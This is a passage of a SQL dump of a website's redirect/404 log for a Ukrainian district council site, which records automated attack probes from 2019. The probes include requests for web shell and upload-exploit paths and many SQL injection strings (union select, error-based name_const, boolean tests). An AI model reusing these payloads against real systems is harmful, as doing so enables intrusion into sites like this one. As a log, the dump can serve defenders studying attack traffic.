00:00:00',301),(33568,'https://malyn-rayrada.gov.ua/doc.php',NULL,'http://site.ru','',14,0,'2019-06-14 08:37:00','0000-00-00 00:00:00',301),(33569,'https://malyn-rayrada.gov.ua/components/logo_img.php',NULL,'http://site.ru','',3,0,'2019-06-14 08:38:47','0000-00-00 00:00:00',301),(33570,'https://malyn-rayrada.gov.ua/components/system.php',NULL,'http://site.ru','',1,0,'2019-06-14 08:45:14','0000-00-00 00:00:00',301),(33571,'https://malyn-rayrada.gov.ua/dwsonv.php',NULL,'http://site.ru','',4,0,'2019-06-14 09:09:12','0000-00-00 00:00:00',301),(33572,'https://malyn-rayrada.gov.ua/logo_img.php',NULL,'http://site.ru','',3,0,'2019-06-14 11:54:21','0000-00-00 00:00:00',301),(33573,'https://malyn-rayrada.gov.ua/templates/logo_img.php',NULL,'http://site.ru','',3,0,'2019-06-14 12:45:05','0000-00-00 00:00:00',301),(33574,'https://malyn-rayrada.gov.ua/index.php/1260-vitaemo-iz-svyatom',NULL,'','',6,0,'2019-06-14 13:18:52','0000-00-00 00:00:00',301),(33575,'https://malyn-rayrada.gov.ua/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php',NULL,'http://malyn-rayrada.gov.ua/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php','',1,0,'2019-06-14 14:47:34','0000-00-00 00:00:00',301),(33576,'https://malyn-rayrada.gov.ua/manager/',NULL,'https://malyn-rayrada.gov.ua/manager/','',1,0,'2019-06-15 02:27:08','0000-00-00 00:00:00',301),(33577,'https://malyn-rayrada.gov.ua/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php',NULL,'http://malyn-rayrada.gov.ua/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php','',1,0,'2019-06-15 03:42:11','0000-00-00 00:00:00',301),(33578,'https://malyn-rayrada.gov.ua/components/com_joomleague/assets/classes/open-flash-chart/ofc_upload_image.php',NULL,'http://malyn-rayrada.gov.ua/components/com_joomleague/assets/classes/open-flash-chart/ofc_upload_image.php','',1,0,'2019-06-16 01:34:02','0000-00-00 00:00:00',301),(33579,'https://malyn-rayrada.gov.ua/components/com_jnews/includes/openflashchart/tmp-upload-images/255test.php?com=123&content=zwnobyaidmrhzhnmz2rmijs=',NULL,'http://malyn-rayrada.gov.ua/components/com_jnews/includes/openflashchart/tmp-upload-images/255test.php?com=123&content=ZWNobyAidmRhZHNmZ2RmIjs=','',1,0,'2019-06-16 07:13:43','0000-00-00 00:00:00',301),(33580,'https://malyn-rayrada.gov.ua/kbbipukaqnbqign/r716qei8wqjmogw/y926i1hwvv6evwwtwxzv/2c5h7rxrulmzwzt/iulgpeynvtn',NULL,'','',1,0,'2019-06-17 06:18:16','0000-00-00 00:00:00',301),(33581,'https://malyn-rayrada.gov.ua/index.php/1005-do-vidoma-zhiteliv',NULL,'','',3,0,'2019-06-17 18:23:29','0000-00-00 00:00:00',301),(33582,'https://malyn-rayrada.gov.ua/blackhat.php',NULL,'','',9,0,'2019-06-18 01:47:07','0000-00-00 00:00:00',301),(33583,'https://malyn-rayrada.gov.ua/f4zj/mini-shell.php',NULL,'http://site.ru','',1,0,'2019-06-18 15:43:36','0000-00-00 00:00:00',301),(33584,'https://malyn-rayrada.gov.ua/css_.php',NULL,'http://site.ru','',2,0,'2019-06-18 16:10:47','0000-00-00 00:00:00',301),(33585,'https://www.malyn-rayrada.gov.ua/index.php/2230-grafik-provedennya-zasidan-postijnikh-komisij-malinskoji-rajonnoji-radi-po-rozglyadu-pitan-yaki-vinosyatsya-na-30-sesiyu-rajonnoji-radi-7-sklikannya',NULL,'','',9,0,'2019-06-20 09:59:13','0000-00-00 00:00:00',301),(33586,'https://www.malyn-rayrada.gov.ua/attachments/article/2236/ðÿð¾ñ–ð¼ðµð½ð½ðµ ð³ð¾ð»ð¾ñ ñƒð²ð°ð½ð½ñ .pdf',NULL,'','',2,0,'2019-06-20 17:44:42','0000-00-00 00:00:00',301),(33587,'https://malyn-rayrada.gov.ua/index.php/1575-pro-sklikannya-11-pozachergovoji-sesiji-rajonnoji-radi-7-sklikannya',NULL,'','',5,0,'2019-06-22 17:19:52','0000-00-00 00:00:00',301),(33588,'https://malyn-rayrada.gov.ua/maill.php',NULL,'','',2,0,'2019-06-22 19:56:33','0000-00-00 00:00:00',301),(33589,'https://malyn-rayrada.gov.ua/adminer.php',NULL,'','',8,0,'2019-06-23 10:21:51','0000-00-00 00:00:00',301),(33590,'https://malyn-rayrada.gov.ua/sql.php',NULL,'','',1,0,'2019-06-23 10:21:53','0000-00-00 00:00:00',301),(33591,'https://malyn-rayrada.gov.ua/phpminiadmin.php',NULL,'','',3,0,'2019-06-23 10:21:55','0000-00-00 00:00:00',301),(33592,'https://malyn-rayrada.gov.ua/modules/mod_dionefileuploader/upload.php',NULL,'http://malyn-rayrada.gov.ua/modules/mod_dionefileuploader/upload.php','',2,0,'2019-06-24 11:10:47','0000-00-00 00:00:00',301),(33593,'https://malyn-rayrada.gov.ua/components/com_jbcatalog/libraries/jsupload/server/php/index.php',NULL,'http://malyn-rayrada.gov.ua/components/com_jbcatalog/libraries/jsupload/server/php/index.php','',1,0,'2019-06-25 17:25:45','0000-00-00 00:00:00',301),(33594,'https://malyn-rayrada.gov.ua/modules/mod_ppc_simple_spotlight/elements/upload_file.php',NULL,'http://malyn-rayrada.gov.ua/modules/mod_ppc_simple_spotlight/elements/upload_file.php','',1,0,'2019-06-25 17:25:45','0000-00-00 00:00:00',301),(33595,'https://malyn-rayrada.gov.ua/components/com_creativecontactform/fileupload/index.php',NULL,'http://malyn-rayrada.gov.ua/components/com_creativecontactform/fileupload/index.php','',1,0,'2019-06-25 17:32:12','0000-00-00 00:00:00',301),(33596,'https://malyn-rayrada.gov.ua/index.php/1580-pro-sklikannya-12-pozachergovoji-sesiji-rajonnoji-radi-7-sklikannya',NULL,'','',2,0,'2019-06-28 06:34:46','0000-00-00 00:00:00',301),(33597,'https://malyn-rayrada.gov.ua/images/configurations.php',NULL,'','',2,0,'2019-06-28 13:09:39','0000-00-00 00:00:00',301),(33598,'https://malyn-rayrada.gov.ua/index.php/1180-do-uvagi-zhiteliv-malinshchini',NULL,'','',1,0,'2019-06-29 05:56:53','0000-00-00 00:00:00',301),(33599,'https://malyn-rayrada.gov.ua/yjh.php',NULL,'','',2,0,'2019-06-30 23:20:52','0000-00-00 00:00:00',301),(33600,'https://malyn-rayrada.gov.ua/index.php/1438-vikonkom-malinivskoji-silskoji-radi-ogoloshue-konkurs',NULL,'','',1,0,'2019-07-01 06:10:16','0000-00-00 00:00:00',301),(33601,'https://malyn-rayrada.gov.ua/index.php/1435-vitaemo-iz-velikodnem',NULL,'','',3,0,'2019-07-04 06:21:54','0000-00-00 00:00:00',301),(33602,'https://malyn-rayrada.gov.ua/index.php/76-povitrjano-transportna-prigoda-bilja-dibrovi',NULL,'','',1,0,'2019-07-04 06:57:22','0000-00-00 00:00:00',301),(33603,'https://malyn-rayrada.gov.ua/kcfinder/browse.php',NULL,'','',1,0,'2019-07-06 04:08:04','0000-00-00 00:00:00',301),(33604,'https://malyn-rayrada.gov.ua/old.kurs.com.ua/ua/informer',NULL,'','',4,0,'2019-07-11 21:29:16','0000-00-00 00:00:00',301),(33605,'https://malyn-rayrada.gov.ua/index.php/javascript:joomla.openinnewwindow(true)',NULL,'','',1,0,'2019-07-11 21:29:21','0000-00-00 00:00:00',301),(33606,'https://malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/javascript:joomla.openinnewwindow(true)',NULL,'','',1,0,'2019-07-11 21:29:31','0000-00-00 00:00:00',301),(33607,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1461-pro-zatverdzhennya-poryadku-priznachennya-na-posadu-kerivnikiv-zagalnoosvitnikh-zakladiv-komunalnoji-formi-vlasnosti-malinskogo-rajonu-zhitomirskoji-oblasti',NULL,'','',5,0,'2019-07-13 06:09:01','0000-00-00 00:00:00',301),(33608,'https://malyn-rayrada.gov.ua/attachments/article/2242/зміни',NULL,'','',1,0,'2019-07-14 15:34:05','0000-00-00 00:00:00',301),(33609,'https://malyn-rayrada.gov.ua/admin/kcfinder/browse.php',NULL,'','',1,0,'2019-07-16 09:46:01','0000-00-00 00:00:00',301),(33610,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja\"',NULL,'','',2,0,'2019-07-17 10:05:39','0000-00-00 00:00:00',301),(33611,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennya-vid-18-09-2015-roku\"',NULL,'','',2,0,'2019-07-17 10:05:40','0000-00-00 00:00:00',301),(33612,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja2121121121212.1',NULL,'','',2,0,'2019-07-17 10:05:46','0000-00-00 00:00:00',301),(33613,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennya-vid-18-09-2015-roku2121121121212.1',NULL,'','',2,0,'2019-07-17 10:05:46','0000-00-00 00:00:00',301),(33614,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja and 1=1',NULL,'','',2,0,'2019-07-17 10:05:49','0000-00-00 00:00:00',301),(33615,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennya-vid-18-09-2015-roku and 1=1',NULL,'','',2,0,'2019-07-17 10:05:49','0000-00-00 00:00:00',301),(33616,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja and 1>1',NULL,'','',2,0,'2019-07-17 10:05:51','0000-00-00 00:00:00',301),(33617,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennya-vid-18-09-2015-roku and 1>1',NULL,'','',2,0,'2019-07-17 10:05:51','0000-00-00 00:00:00',301),(33618,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja\' and \'x\'=\'x',NULL,'','',1,0,'2019-07-17 10:05:53','0000-00-00 00:00:00',301),(33619,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennya-vid-18-09-2015-roku\' and \'x\'=\'x',NULL,'','',2,0,'2019-07-17 10:05:53','0000-00-00 00:00:00',301),(33620,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja\' and \'x\'=\'y',NULL,'','',2,0,'2019-07-17 10:05:55','0000-00-00 00:00:00',301),(33621,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennya-vid-18-09-2015-roku\' and \'x\'=\'y',NULL,'','',1,0,'2019-07-17 10:05:55','0000-00-00 00:00:00',301),(33622,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja\" and \"x\"=\"x',NULL,'','',2,0,'2019-07-17 10:05:57','0000-00-00 00:00:00',301),(33623,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennya-vid-18-09-2015-roku\" and \"x\"=\"x',NULL,'','',1,0,'2019-07-17 10:05:57','0000-00-00 00:00:00',301),(33624,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja\" and \"x\"=\"y',NULL,'','',2,0,'2019-07-17 10:05:59','0000-00-00 00:00:00',301),(33625,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennya-vid-18-09-2015-roku\" and \"x\"=\"y',NULL,'','',2,0,'2019-07-17 10:05:59','0000-00-00 00:00:00',301),(33626,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja999999.1 union select unhex(hex(version())) -- and 1=1',NULL,'','',2,0,'2019-07-17 10:06:01','0000-00-00 00:00:00',301),(33627,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennya-vid-18-09-2015-roku999999.1 union select unhex(hex(version())) -- and 1=1',NULL,'','',2,0,'2019-07-17 10:06:01','0000-00-00 00:00:00',301),(33628,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja99999\' union select unhex(hex(version())) -- \'x\'=\'x',NULL,'','',2,0,'2019-07-17 10:06:03','0000-00-00 00:00:00',301),(33629,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennya-vid-18-09-2015-roku99999\' union select unhex(hex(version())) -- \'x\'=\'x',NULL,'','',1,0,'2019-07-17 10:06:03','0000-00-00 00:00:00',301),(33630,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja99999\" union select unhex(hex(version())) -- \"x\"=\"x',NULL,'','',1,0,'2019-07-17 10:06:05','0000-00-00 00:00:00',301),(33631,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennya-vid-18-09-2015-roku99999\" union select unhex(hex(version())) -- \"x\"=\"x',NULL,'','',2,0,'2019-07-17 10:06:05','0000-00-00 00:00:00',301),(33632,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja or (1,2)=(select*from(select name_const(char(73,65,98,102,118,85,89,72,117),1),name_const(char(73,65,98,102,118,85,89,72,117),1))a) -- and 1=1',NULL,'','',1,0,'2019-07-17 10:06:07','0000-00-00 00:00:00',301),(33633,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennya-vid-18-09-2015-roku or (1,2)=(select*from(select name_const(char(109,121,118,103,104,66,104,99,69,106),1),name_const(char(109,121,118,103,104,66,104,99,69,106),1))a) -- and 1=1',NULL,'','',1,0,'2019-07-17 10:06:08','0000-00-00 00:00:00',301),(33634,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja\' or (1,2)=(select*from(select name_const(char(73,65,98,102,118,85,89,72,117),1),name_const(char(73,65,98,102,118,85,89,72,117),1))a) -- \'x\'=\'x',NULL,'','',1,0,'2019-07-17 10:06:09','0000-00-00 00:00:00',301),(33635,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennya-vid-18-09-2015-roku\' or (1,2)=(select*from(select name_const(char(109,121,118,103,104,66,104,99,69,106),1),name_const(char(109,121,118,103,104,66,104,99,69,106),1))a) -- \'x\'=\'x',NULL,'','',1,0,'2019-07-17 10:06:09','0000-00-00 00:00:00',301),(33636,'https://malyn-rayrada.gov.ua/img src=\'//old.kurs.com.ua/static/images/informer/kurs.png\' width=\'52\' height=\'26\' alt=\'kurs.com.ua: курс валют в украине!\' title=\'курс валют\' border=\'0\' /\"',NULL,'','',2,0,'2019-07-17 10:06:12','0000-00-00 00:00:00',301),(33637,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennya-vid-18-09-2015-roku\" or (1,2)=(select*from(select name_const(char(109,121,118,103,104,66,104,99,69,106),1),name_const(char(109,121,118,103,104,66,104,99,69,106),1))a) -- \"x\"=\"x',NULL,'','',1,0,'2019-07-17 10:06:12','0000-00-00 00:00:00',301),(33638,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja\" or (1,2)=(select*from(select name_const(char(73,65,98,102,118,85,89,72,117),1),name_const(char(73,65,98,102,118,85,89,72,117),1))a) -- \"x\"=\"x',NULL,'','',1,0,'2019-07-17 10:06:12','0000-00-00 00:00:00',301),(33639,'https://malyn-rayrada.gov.ua/img src=\'//old.kurs.com.ua/static/images/informer/kurs.png\' width=\'52\' height=\'26\' alt=\'kurs.com.ua: курс валют в украине!\' title=\'курс валют\' border=\'0\' / and 1=1',NULL,'','',2,0,'2019-07-17 10:06:18','0000-00-00 00:00:00',301),(33640,'https://malyn-rayrada.gov.ua/img src=\'//old.kurs.com.ua/static/images/informer/kurs.png\' width=\'52\' height=\'26\' alt=\'kurs.com.ua: курс валют в украине!\' title=\'курс валют\' border=\'0\' / and 1>1',NULL,'','',1,0,'2019-07-17 10:06:20','0000-00-00 00:00:00',301),(33641,'https://malyn-rayrada.gov.ua/img src=\'//old.kurs.com.ua/static/images/informer/kurs.png\' width=\'52\' height=\'26\' alt=\'kurs.com.ua: курс валют в украине!\' title=\'курс валют\' border=\'0\' /\' and \'x\'=\'x',NULL,'','',2,0,'2019-07-17 10:06:21','0000-00-00 00:00:00',301),(33642,'https://malyn-rayrada.gov.ua/img src=\'//old.kurs.com.ua/static/images/informer/kurs.png\' width=\'52\' height=\'26\' alt=\'kurs.com.ua: курс валют в украине!\' title=\'курс валют\' border=\'0\' /\' and \'x\'=\'y',NULL,'','',1,0,'2019-07-17 10:06:23','0000-00-00 00:00:00',301),(33643,'https://malyn-rayrada.gov.ua/img src=\'//old.kurs.com.ua/static/images/informer/kurs.png\' width=\'52\' height=\'26\' alt=\'kurs.com.ua: курс валют в украине!\' title=\'курс валют\' border=\'0\' /\" and \"x\"=\"x',NULL,'','',1,0,'2019-07-17 10:06:25','0000-00-00 00:00:00',301),(33644,'https://malyn-rayrada.gov.ua/\"',NULL,'','',1,0,'2019-07-17 10:06:26','0000-00-00 00:00:00',301),(33645,'https://malyn-rayrada.gov.ua/img src=\'//old.kurs.com.ua/static/images/informer/kurs.png\' width=\'52\' height=\'26\' alt=\'kurs.com.ua: курс валют в украине!\' title=\'курс валют\' border=\'0\' /\" and \"x\"=\"y',NULL,'','',1,0,'2019-07-17 10:06:27','0000-00-00 00:00:00',301),(33646,'https://malyn-rayrada.gov.ua/img src=\'//old.kurs.com.ua/static/images/informer/kurs.png\' width=\'52\' height=\'26\' alt=\'kurs.com.ua: курс валют в украине!\' title=\'курс валют\' border=\'0\' /99999\' union select unhex(hex(version())) -- \'x\'=\'x',NULL,'','',1,0,'2019-07-17 10:06:30','0000-00-00 00:00:00',301),(33647,'https://malyn-rayrada.gov.ua/img src=\'//old.kurs.com.ua/static/images/informer/kurs.png\' width=\'52\' height=\'26\' alt=\'kurs.com.ua: курс валют в украине!\' title=\'курс валют\' border=\'0\' /99999\" union select unhex(hex(version())) -- \"x\"=\"x',NULL,'','',2,0,'2019-07-17 10:06:32','0000-00-00 00:00:00',301),(33648,'https://malyn-rayrada.gov.ua/ and 1=1',NULL,'','',1,0,'2019-07-17 10:06:33','0000-00-00 00:00:00',301),(33649,'https://malyn-rayrada.gov.ua/img src=\'//old.kurs.com.ua/static/images/informer/kurs.png\' width=\'52\' height=\'26\' alt=\'kurs.com.ua: курс валют в украине!\' title=\'курс валют\' border=\'0\' / or (1,2)=(select*from(select name_const(char(113,113,78,77,87,71,84,76,77),1),name_const(char(113,113,78,77,87,71,84,76,77),1))a) -- and 1=1',NULL,'','',1,0,'2019-07-17 10:06:34','0000-00-00 00:00:00',301),(33650,'https://malyn-rayrada.gov.ua/ and 1>1',NULL,'','',1,0,'2019-07-17 10:06:35','0000-00-00 00:00:00',301),(33651,'https://malyn-rayrada.gov.ua/img src=\'//old.kurs.com.ua/static/images/informer/kurs.png\' width=\'52\' height=\'26\' alt=\'kurs.com.ua: курс валют в украине!\' title=\'курс валют\' border=\'0\' /\' or (1,2)=(select*from(select name_const(char(113,113,78,77,87,71,84,76,77),1),name_const(char(113,113,78,77,87,71,84,76,77),1))a) -- \'x\'=\'x',NULL,'','',1,0,'2019-07-17 10:06:36','0000-00-00 00:00:00',301),(33652,'https://malyn-rayrada.gov.ua/\' and \'x\'=\'x',NULL,'','',1,0,'2019-07-17 10:06:38','0000-00-00 00:00:00',301),(33653,'https://malyn-rayrada.gov.ua/img src=\'//old.kurs.com.ua/static/images/informer/kurs.png\' width=\'52\' height=\'26\' alt=\'kurs.com.ua: курс валют в украине!\' title=\'курс валют\' border=\'0\' /\" or (1,2)=(select*from(select name_const(char(113,113,78,77,87,71,84,76,77),1),name_const(char(113,113,78,77,87,71,84,76,77),1))a) -- \"x\"=\"x',NULL,'','',1,0,'2019-07-17 10:06:38','0000-00-00 00:00:00',301),(33654,'https://malyn-rayrada.gov.ua/\' and \'x\'=\'y',NULL,'','',1,0,'2019-07-17 10:06:39','0000-00-00 00:00:00',301),(33655,'https://malyn-rayrada.gov.ua/\" and \"x\"=\"x',NULL,'','',1,0,'2019-07-17 10:06:41','0000-00-00 00:00:00',301),(33656,'https://malyn-rayrada.gov.ua/\" and \"x\"=\"y',NULL,'','',1,0,'2019-07-17 10:06:42','0000-00-00 00:00:00',301),(33657,'https://malyn-rayrada.gov.ua/99999\' union select unhex(hex(version())) -- \'x\'=\'x',NULL,'','',1,0,'2019-07-17 10:06:46','0000-00-00 00:00:00',301),(33658,'https://malyn-rayrada.gov.ua/99999\" union select unhex(hex(version())) -- \"x\"=\"x',NULL,'','',2,0,'2019-07-17 10:06:48','0000-00-00 00:00:00',301),(33659,'https://malyn-rayrada.gov.ua/ or (1,2)=(select*from(select name_const(char(109,103,105,100,106,105,84,121,113),1),name_const(char(109,103,105,100,106,105,84,121,113),1))a) -- and 1=1',NULL,'','',1,0,'2019-07-17 10:06:50','0000-00-00 00:00:00',301),(33660,'https://malyn-rayrada.gov.ua/\' or (1,2)=(select*from(select name_const(char(109,103,105,100,106,105,84,121,113),1),name_const(char(109,103,105,100,106,105,84,121,113),1))a) -- \'x\'=\'x',NULL,'','',1,0,'2019-07-17 10:06:52','0000-00-00 00:00:00',301),(33661,'https://malyn-rayrada.gov.ua/\" or (1,2)=(select*from(select name_const(char(109,103,105,100,106,105,84,121,113),1),name_const(char(109,103,105,100,106,105,84,121,113),1))a) -- \"x\"=\"x',NULL,'','',1,0,'2019-07-17 10:06:54','0000-00-00 00:00:00',301),(33662,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennya-vid-18-09-2015-roku\' or (1,2)=(select*from(select name_const(char(73,65,108,70,79,70,80,88,74),1),name_const(char(73,65,108,70,79,70,80,88,74),1))a) -- \'x\'=\'x',NULL,'','',1,0,'2019-07-17 10:40:27','0000-00-00 00:00:00',301),(33663,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennya-vid-18-09-2015-roku\" or (1,2)=(select*from(select name_const(char(73,65,108,70,79,70,80,88,74),1),name_const(char(73,65,108,70,79,70,80,88,74),1))a) -- \"x\"=\"x',NULL,'','',1,0,'2019-07-17 10:40:28','0000-00-00 00:00:00',301),(33664,'https://malyn-rayrada.gov.ua/ or (1,2)=(select*from(select name_const(char(116,88,97,72,114,99,108,87,122),1),name_const(char(116,88,97,72,114,99,108,87,122),1))a) -- and 1=1',NULL,'','',1,0,'2019-07-17 10:40:32','0000-00-00 00:00:00',301),(33665,'https://malyn-rayrada.gov.ua/\' or (1,2)=(select*from(select name_const(char(116,88,97,72,114,99,108,87,122),1),name_const(char(116,88,97,72,114,99,108,87,122),1))a) -- \'x\'=\'x',NULL,'','',1,0,'2019-07-17 10:40:33','0000-00-00 00:00:00',301),(33666,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja\' or (1,2)=(select*from(select name_const(char(103,65,74,119,122,105,107,106,114,101,70),1),name_const(char(103,65,74,119,122,105,107,106,114,101,70),1))a) -- \'x\'=\'x',NULL,'','',1,0,'2019-07-17 10:40:33','0000-00-00 00:00:00',301),(33667,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja\" or (1,2)=(select*from(select name_const(char(103,65,74,119,122,105,107,106,114,101,70),1),name_const(char(103,65,74,119,122,105,107,106,114,101,70),1))a) -- \"x\"=\"x',NULL,'','',1,0,'2019-07-17 10:40:35','0000-00-00 00:00:00',301),(33668,'https://malyn-rayrada.gov.ua/index.php/deputatska-storinka/2010-06-05-12-51-341111111111111 union select char(45,120,49,45,81,45),char(45,120,50,45,81,45),char(45,120,51,45,81,45),char(45,120,52,45,81,45),char(45,120,53,45,81,45),char(45,120,54,45,81,45),char(45,120,55,45,81,45) --  /*',NULL,'','',1,0,'2019-07-17 10:40:36','0000-00-00 00:00:00',301),(33669,'https://malyn-rayrada.gov.ua/index.php/deputatska-storinka/2010-06-05-12-51-341111111111111 union select char(45,120,49,45,81,45),char(45,120,50,45,81,45),char(45,120,51,45,81,45),char(45,120,52,45,81,45),char(45,120,53,45,81,45),char(45,120,54,45,81,45),char(45,120,55,45,81,45),char(45,120,56,45,81,45),char(45,120,57,45,81,45),char(45,120,49,48,45,81,45),char(45,120,49,49,45,81,45),char(45,120,49,50,45,81,45),char(45,120,49,51,45,81,45) --  /*',NULL,'','',1,0,'2019-07-17 10:40:37','0000-00-00 00:00:00',301),(33670,'https://malyn-rayrada.gov.ua/index.php/deputatska-storinka/2010-06-05-12-51-341111111111111 union select char(45,120,49,45,81,45),char(45,120,50,45,81,45),char(45,120,51,45,81,45),char(45,120,52,45,81,45),char(45,120,53,45,81,45),char(45,120,54,45,81,45),char(45,120,55,45,81,45),char(45,120,56,45,81,45),char(45,120,57,45,81,45),char(45,120,49,48,45,81,45),char(45,120,49,49,45,81,45),char(45,120,49,50,45,81,45),char(45,120,49,51,45,81,45),char(45,120,49,52,45,81,45),char(45,120,49,53,45,81,45) --  /*',NULL,'','',1,0,'2019-07-17 10:40:38','0000-00-00 00:00:00',301),(33671,'https://malyn-rayrada.gov.ua/index.php/deputatska-storinka/2010-06-05-12-51-341111111111111 union select char(45,120,49,45,81,45),char(45,120,50,45,81,45),char(45,120,51,45,81,45),char(45,120,52,45,81,45),char(45,120,53,45,81,45),char(45,120,54,45,81,45),char(45,120,55,45,81,45),char(45,120,56,45,81,45),char(45,120,57,45,81,45),char(45,120,49,48,45,81,45),char(45,120,49,49,45,81,45),char(45,120,49,50,45,81,45),char(45,120,49,51,45,81,45),char(45,120,49,52,45,81,45),char(45,120,49,53,45,81,45),char(45,120,49,54,45,81,45) --  /*',NULL,'','',1,0,'2019-07-17 10:40:38','0000-00-00 00:00:00',301),(33672,'https://malyn-rayrada.gov.ua/index.php/deputatska-storinka/2010-06-05-12-51-341111111111111 union select char(45,120,49,45,81,45),char(45,120,50,45,81,45),char(45,120,51,45,81,45),char(45,120,52,45,81,45),char(45,120,53,45,81,45),char(45,120,54,45,81,45),char(45,120,55,45,81,45),char(45,120,56,45,81,45),char(45,120,57,45,81,45),char(45,120,49,48,45,81,45),char(45,120,49,49,45,81,45),char(45,120,49,50,45,81,45),char(45,120,49,51,45,81,45),char(45,120,49,52,45,81,45),char(45,120,49,53,45,81,45),char(45,120,49,54,45,81,45),char(45,120,49,55,45,81,45),char(45,120,49,56,45,81,45) --  /*',NULL,'','',1,0,'2019-07-17 10:40:39','0000-00-00 00:00:00',301),(33673,'https://malyn-rayrada.gov.ua/index.php/deputatska-storinka/2010-06-05-12-51-341111111111111 union select char(45,120,49,45,81,45),char(45,120,50,45,81,45),char(45,120,51,45,81,45),char(45,120,52,45,81,45),char(45,120,53,45,81,45),char(45,120,54,45,81,45),char(45,120,55,45,81,45),char(45,120,56,45,81,45),char(45,120,57,45,81,45),char(45,120,49,48,45,81,45),char(45,120,49,49,45,81,45),char(45,120,49,50,45,81,45),char(45,120,49,51,45,81,45),char(45,120,49,52,45,81,45),char(45,120,49,53,45,81,45),char(45,120,49,54,45,81,45),char(45,120,49,55,45,81,45),char(45,120,49,56,45,81,45),char(45,120,49,57,45,81,45),char(45,120,50,48,45,81,45),char(45,120,50,49,45,81,45),char(45,120,50,50,45,81,45),char(45,120,50,51,45,81,45) --  /*',NULL,'','',1,0,'2019-07-17 10:40:39','0000-00-00 00:00:00',301),(33674,'https://malyn-rayrada.gov.ua/index.php/deputatska-storinka/2010-06-05-12-51-341111111111111 union select char(45,120,49,45,81,45),char(45,120,50,45,81,45),char(45,120,51,45,81,45),char(45,120,52,45,81,45),char(45,120,53,45,81,45),char(45,120,54,45,81,45),char(45,120,55,45,81,45),char(45,120,56,45,81,45),char(45,120,57,45,81,45),char(45,120,49,48,45,81,45),char(45,120,49,49,45,81,45),char(45,120,49,50,45,81,45),char(45,120,49,51,45,81,45),char(45,120,49,52,45,81,45),char(45,120,49,53,45,81,45),char(45,120,49,54,45,81,45),char(45,120,49,55,45,81,45),char(45,120,49,56,45,81,45),char(45,120,49,57,45,81,45),char(45,120,50,48,45,81,45),char(45,120,50,49,45,81,45),char(45,120,50,50,45,81,45),char(45,120,50,51,45,81,45),char(45,120,50,52,45,81,45) --  /*',NULL,'','',1,0,'2019-07-17 10:40:40','0000-00-00 00:00:00',301),(33675,'https://malyn-rayrada.gov.ua/index.php/deputatska-storinka/2010-06-05-12-51-341111111111111\' union select char(45,120,49,45,81,45) -- /* order by \'as /*',NULL,'','',1,0,'2019-07-17 10:40:41','0000-00-00 00:00:00',301),(33676,'https://malyn-rayrada.gov.ua/index.php/deputatska-storinka/2010-06-05-12-51-341111111111111\' union select char(45,120,49,45,81,45),char(45,120,50,45,81,45) -- /* order by \'as /*',NULL,'','',1,0,'2019-07-17 10:40:42','0000-00-00 00:00:00',301),(33677,'https://malyn-rayrada.gov.ua/index.php/deputatska-storinka/2010-06-05-12-51-341111111111111\' union select char(45,120,49,45,81,45),char(45,120,50,45,81,45),char(45,120,51,45,81,45) -- /* order by \'as /*',NULL,'','',1,0,'2019-07-17 10:40:42','0000-00-00 00:00:00',301),(33678,'https://malyn-rayrada.gov.ua/index.php/deputatska-storinka/2010-06-05-12-51-341111111111111\' union select char(45,120,49,45,81,45),char(45,120,50,45,81,45),char(45,120,51,45,81,45),char(45,120,52,45,81,45) -- /* order by \'as /*',NULL,'','',1,0,'2019-07-17 10:40:43','0000-00-00 00:00:00',301),(33679,'https://malyn-rayrada.gov.ua/index.php/deputatska-storinka/2010-06-05-12-51-341111111111111\' union select char(45,120,49,45,81,45),char(45,120,50,45,81,45),char(45,120,51,45,81,45),char(45,120,52,45,81,45),char(45,120,53,45,81,45),char(45,120,54,45,81,45),char(45,120,55,45,81,45),char(45,120,56,45,81,45) -- /* order by \'as /*',NULL,'','',1,0,'2019-07-17 10:40:46','0000-00-00 00:00:00',301),(33680,'https://malyn-rayrada.gov.ua/index.php/deputatska-storinka/2010-06-05-12-51-341111111111111\' union select 